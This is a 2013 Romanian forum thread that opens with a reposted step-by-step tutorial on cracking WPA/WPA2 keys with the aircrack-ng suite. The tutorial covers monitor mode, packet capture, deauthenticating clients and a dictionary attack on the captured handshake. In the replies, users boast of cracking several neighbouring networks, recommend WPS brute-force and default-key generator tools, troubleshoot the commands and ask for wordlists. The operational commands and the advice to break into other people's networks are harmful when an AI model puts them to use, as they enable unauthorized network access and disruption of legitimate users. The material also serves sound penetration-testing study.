Nytro Posted April 2, 2013 Report Posted April 2, 2013 [h=3]How To Crack A WPA Key With Aircrack-ng[/h]With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2 Step 1 : Setting up your network device To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:Command # iwconfig (to find all wireless network interfaces and their status) Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name) Step 2 : Reconnaissance This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range. Step 3 : Capturing Packets To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 Step 4 : De-Authentication Technique To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client. So, now we have successfully acquired a WPA Handshake. Step 5 : Cracking WPA/WAP2 Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.About The Author Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.Sursa: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips Quote
Maximus Posted April 2, 2013 Report Posted April 2, 2013 dar WPA2? cam toate vin cu WPA2 ca default Quote
TheTime Posted April 2, 2013 Report Posted April 2, 2013 Spide, e acelasi procedeu. Mai sus te invata pas cu pas cum sa capturezi un handshake iar apoi sa faci brute force pe el, pe baza unui dictionar.O alta metoda ar fi sa verifici daca are WPS-ul activat si sa faci un bruteforce pe acesta. Nu toate routerele au WPS activat, nu toate care il au activat merg supuse atacurilor, dar in cazurile favorabile parola iese mult mai repede. Daca chiar vrei sa spargi vreo retea cu wpa/wpa2, cam astea ar fi metodele. Quote
danger2u Posted April 2, 2013 Report Posted April 2, 2013 mersi nitroastept sa fac bani de antena aia tplink parabolica si revin cu feedback Quote
GarryOne Posted April 2, 2013 Report Posted April 2, 2013 mersi nitroastept sa fac bani de antena aia tplink parabolica si revin cu feedbackAsa credeam si eu, ca asta e singura solutie, pana mi-am bagat wifislax. Am spart deja 5 retele wireless in ultime 24 de ore, indiferent ca erau wep, wpa sau wpa2. Deci, poti sa spargi parolele bine-mersi si cu placa de retea a laptopului, doar tre sa stii cum. Quote
danger2u Posted April 2, 2013 Report Posted April 2, 2013 Asa credeam si eu, ca asta e singura solutie, pana mi-am bagat wifislax. Am spart deja 5 retele wireless in ultime 24 de ore, indiferent ca erau wep, wpa sau wpa2. Deci, poti sa spargi parolele bine-mersi si cu placa de retea a laptopului, doar tre sa stii cum.imi dai un sfat si miein privat^?mersi frumos Quote
GarryOne Posted April 2, 2013 Report Posted April 2, 2013 (edited) Nu am ce sa ascund, iti instalezi wifislax, care este mult mai bun ca backtrack-ul in acest domeniu. GOYscript este ceva fantastic. GOYscript wep,wpa,wps face cam toata treaba. Mai este si WPSPinGenerator care iti da parola instant in cazul unor routere. Mai este si Inflator, dar GOYscript isi face treaba mai bine. Edited April 3, 2013 by GarryOne Quote
danger2u Posted April 3, 2013 Report Posted April 3, 2013 ok daca poti sa imi dai un link de unde sa iau wifislaxmersi Quote
danger2u Posted April 3, 2013 Report Posted April 3, 2013 Servidor www.seguridadwireless.netvreo idee??? Quote
Maximus Posted April 3, 2013 Report Posted April 3, 2013 imi da o eroare :oot@bt:~# airodump-ng -c 4 -bssid C8:3A:35:07:21:90 AP_MAC -w data mon0Notice: You specified "-bssid". Did you mean "--bssid" instead?yNotice: Channel range already given"airodump-ng --help" for help.root@bt:~# airodump-ng --bssid C8:3A:35:07:21:90 AP_MAC -w data mon0"airodump-ng --help" for help.root@bt:~# ma poate ajuta vreo cineva? Multumesc anticipat. Quote
GarryOne Posted April 3, 2013 Report Posted April 3, 2013 (edited) imi da o eroare :ma poate ajuta vreo cineva? Multumesc anticipat.Ori folosesti -b ori --bssid, dar nici intr-un caz -bssidDar ca un sfat, mai bine folosesti GOYscript sau Reaver decat aircrackvreo idee???Nu gaseste nici o retea cu WPS activat Edited April 3, 2013 by GarryOne Quote
Maximus Posted April 3, 2013 Report Posted April 3, 2013 aceiasi prostie si cu -coot@bt:~# airodump-ng -c 4 -b C8:3A:35:07:21:90 AP_MAC -w data mon0Notice: Channel range already given"airodump-ng --help" for help.root@bt:~# scuze pt dublu post dar ma chinui de vreo 2 ore Quote
GarryOne Posted April 3, 2013 Report Posted April 3, 2013 (edited) In primul rand, e un notice, adica doar o atentionare, deci nu te afecteaza cu nimic, poti sa n-o bagi in seama. In al doilea rand trebuie sa citesti eroarea "channel already given" adica channel-ul e cunoscut deja, nu trebuie sa-l mai specifici.Lasa aircrack-ul si instaleaza-ti modul-ul GOYscript (gasesti tutoriale pe net) sau iti bagi wifislax care are integrat toate astea, si doar alegi reteaua si GOYscript face toata treaba pentru tine. Mai poti incerca si cu WPSPinGenerator care iti da parola instant pentru unele routere care au pin-ul default. Edited April 3, 2013 by GarryOne Quote
GarryOne Posted April 3, 2013 Report Posted April 3, 2013 Trebuie sa fii prin preajma unor retele wifi ca altfel cum vrei sa spargi tu? Cam 80% din routere au WPS activat, daca tie nu iti gaseste nici una, insaemna ca nu prea ai retele wifi in jurul tau. Incearca cu GOYscript WEP, poate ai retele wep. Eu am spart 2 retele wep, fiecare in 6 mintue cu GOYscript WEP. Quote
danger2u Posted April 4, 2013 Report Posted April 4, 2013 mi a gasit si mi a salvat un handshakece fac cu el? Quote
GarryOne Posted April 4, 2013 Report Posted April 4, 2013 Parola iti apare un consola, nu stiu ce ai facut tu acolo. Posteaza un screenshot sa vad. Probabil nu ai fost atent cand ti-a aparut parola Quote
Maximus Posted April 4, 2013 Report Posted April 4, 2013 tot nu reusesc sa obtin un handshakeH 4 ][ Elapsed: 11 mins ][ 2013-04-04 05:50 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID C8:3A:35:07:21:90 -127 100 6805 550 1 4 54e. WPA2 CCMP PSK Sparge-ma BSSID STATION PWR Rate Lost Frames Probe C8:3A:35:07:21:90 48:5D:60:39:B4:6B -127 1e- 1 0 20636 Sparge-ma 05:46:27 Sending 64 directed DeAuth. STMAC: [48:5D:60:39:B4:6B] [ 2|58 ACKs]ma deconecteaza, se conecteaza laptop-ul automat dar nu-mi da handshake Quote
GarryOne Posted April 4, 2013 Report Posted April 4, 2013 Am sa revin si eu cu un tutorial din ce am invatat pana acum, experimentand foarte mult.PS: Cu ocazia la wifislax, am invatat deja spaniola binisor Quote
danger2u Posted April 4, 2013 Report Posted April 4, 2013 GOYscript wpaWifislax - YouTubece tre sa fac in continuare?? Quote
sorelian Posted April 4, 2013 Report Posted April 4, 2013 (edited) Nu stiu ce varianta beta de wifislax ai descarcat...ultima e beta 13.Nu stiu ce placa wireless ai...dar nu-ti gaseste reteaua si clientul asociat ,fara de care nu poti obtine handshake !Pe moment nu exista in continuare.Ai aici un demo pentru goyscriptWPA: Dar , daca e vorba de o retea ALICE...nu ai cautat pe siteurile italiene keygeneratoare pentru ALICE ?E in functie de MAC... Chiar daca ai sa obtii handshake nu ai ce sa faci cu el in lipsa unui dictionar adecvat. Astea, in 99% din cazuriraman cu key default. Edited April 4, 2013 by sorelian Quote
danger2u Posted April 4, 2013 Report Posted April 4, 2013 (edited) ai vreun dictionar bun?wifislax 4.4 beta Edited April 4, 2013 by danger2u Quote